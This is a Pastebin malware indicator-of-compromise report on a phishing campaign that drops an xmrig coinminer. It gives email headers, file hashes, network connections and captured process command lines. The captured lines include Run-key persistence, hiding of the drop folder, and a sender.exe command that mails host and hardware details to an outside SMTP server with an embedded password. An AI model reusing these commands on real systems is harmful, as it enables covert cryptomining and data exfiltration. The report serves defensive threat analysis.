API tools faq
paste
Advertisement
VRad

#coinminer_020919

VRad
Sep 2nd, 2019
356
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.44 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #xmrig #bmcon #coinminer #SCR #UPX
  2.  
  3. https://pastebin.com/LjHZHhc4
  4.  
  5. previous_contact:
  6. https://pastebin.com/eTPuCkhC
  7.  
  8. FAQ:
  9. https://github.com/xmrig/xmrig
  10.  
  11. attack_vector
  12. --------------
  13. email attach .RAR > .SCR > C:\Intel\*.exe
  14.  
  15. email_headers
  16. --------------
  17. Received: from s02.spamexperts.axc.nl (s02.spamexperts.axc.nl [185.182.56.112])
  18. Received: from vserver384.axc.nl ([185.182.56.51])
  19. Received: from [185.155.99.35] (helo=46-211-54-11.mobile.kyivstar.net)
  20. From: Бухгалтерія <mail@fin-director.nl>
  21. Subject: Доброго дня
  22. To: "user00" <user00@victim1.com>
  23. Date: Mon, 2 Sep 2019 05:14:31 +0300
  24. X-Originating-IP: 185.182.56.51
  25. X-SpamExperts-Domain: vserver384.axc.nl
  26.  
  27. files
  28. --------------
  29. SHA-256 021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9
  30. File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.rar [RAR archive data, v34]
  31. File size 983.41 KB (1007012 bytes)
  32.  
  33. SHA-256 067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b
  34. File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
  35. File size 1.02 MB (1066275 bytes)
  36.  
  37. SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
  38. File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows, UPX compressed]
  39. File size 354.5 KB (363008 bytes)
  40.  
  41. SHA-256 d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94
  42. File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows]
  43. File size 1.31 MB (1370624 bytes)
  44.  
  45.  
  46. activity
  47. **************
  48.  
  49. netwrk
  50. --------------
  51. [ssl]
  52. 88.99.38.225 dl.browsermine.com Client Hello
  53.  
  54. [http]
  55. 13.107.4.50 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?698df6719eccbc04 HTTP/1.1 Microsoft-CryptoAPI/6.1
  56. 77.120.60.192 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
  57. 77.120.60.187 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgOEzWC36QVDJo6DaBgPQDAh%2Bw%3D%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
  58. 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b835bcf15aa1abf HTTP/1.1 Microsoft-CryptoAPI/6.1
  59. 77.120.60.201 crl.microsoft.com GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
  60.  
  61.  
  62. comp
  63. --------------
  64. bmcon.exe 2308 TCP localhost 49248 88.99.38.225 443 ESTABLISHED
  65. bmcon.exe 2308 TCP localhost 49249 13.107.4.50 80 ESTABLISHED
  66. bmcon.exe 2308 TCP localhost 49250 77.120.60.192 80 ESTABLISHED
  67. bmcon.exe 2308 TCP localhost 49251 77.120.60.187 80 ESTABLISHED
  68. bmcon.exe 2308 TCP localhost 49252 88.99.38.225 443 ESTABLISHED
  69. bm-xmrig.exe 2696 TCP localhost 49253 159.69.189.115 4444 ESTABLISHED
  70.  
  71. proc
  72. --------------
  73. "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
  74. "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
  75. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  76. C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\Intel\enable.cmd" "
  77. C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "╨Ш╨╜╤В╨╡╨│╤А╨╕╤А╨╛╨▓╨░╨╜╨╜╤Л╨╡_╨┤╤А╨░╨╣╨▓╨╡╤А╨░" /f
  78. C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
  79. C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
  80. C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
  81. C:\Windows\SysWOW64\powercfg.exe powercfg -h off
  82. C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
  83. C:\Windows\SysWOW64\attrib.exe C:\Windows\SysWOW64\attrib.exe
  84. C:\Windows\SysWOW64\cmd.exe /c ver
  85.  
  86. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
  87. C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC CPU Get Name /Value
  88.  
  89. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
  90. C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC /Node:localhost Path Win32_VideoController Get Name /Value
  91.  
  92. C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar sender.exe C:\ntel\sender.exe /y
  93. C:\Intel\sender.exe -to recipient@office-center.site -f "Robot4<sender2@office-center.site>" -server smtp.office-center.site -port 587 -u sender2@office-center.site -pw epsiloneridana -subject "host1/user1" -body "OS-WindowsX x64/CPU-Intel(R) CPU @ 2.20GHz/Cores-2/GPU-VGA"
  94.  
  95. C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\privat.exe" /f
  96.  
  97. C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar privat.exe C:\ntel\privat.exe /y
  98.  
  99. C:\Windows\SysWOW64\PING.EXE ping -n 3600 127.0.0.1
  100.  
  101. "C:\Intel\driver.exe" e -hplimpid2903392 C:\Intel\sender.rar bmcon.exe C:\ntel\bmcon.exe /y
  102.  
  103. "C:\Intel\bmcon.exe"
  104. "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
  105. "C:\Intel\bmcon\bm-xmrig.exe"
  106.  
  107. persist
  108. --------------
  109. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 02.09.2019 13:29
  110.  
  111. 1) BMCon
  112. c:\intel\bmcon.exe 03.11.2018 3:42
  113.  
  114. 2) private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
  115. c:\intel\privat.exe 20.06.1992 1:22
  116.  
  117. drop
  118. --------------
  119. C:\Intel\bmcon.exe
  120. C:\Intel\bmcon.json
  121. C:\Intel\driver.exe
  122. C:\Intel\privat.exe
  123. C:\Intel\sender.exe
  124. C:\Intel\sender.rar
  125. ...
  126. C:\Intel\bmcon\apps.json
  127. C:\Intel\bmcon\bmstart.exe
  128. C:\Intel\bmcon\bm-xmrig.exe
  129. C:\Intel\bmcon\bm-xmrig.json
  130.  
  131. # # #
  132. https://www.virustotal.com/gui/file/021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9/details
  133. https://www.virustotal.com/gui/file/067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b/details
  134. https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
  135. https://www.virustotal.com/gui/file/d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94/details
  136. https://analyze.intezer.com/#/analyses/8b188ab9-9120-46ae-80b9-a811dd9d73e2
  137. https://analyze.intezer.com/#/analyses/2b2add43-448a-4c8e-984c-b49c805873a3
  138. https://analyze.intezer.com/#/analyses/cba2a28c-10df-491c-b5f9-7e974cde1df0
  139.  
  140. VR
  141.  
  142. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!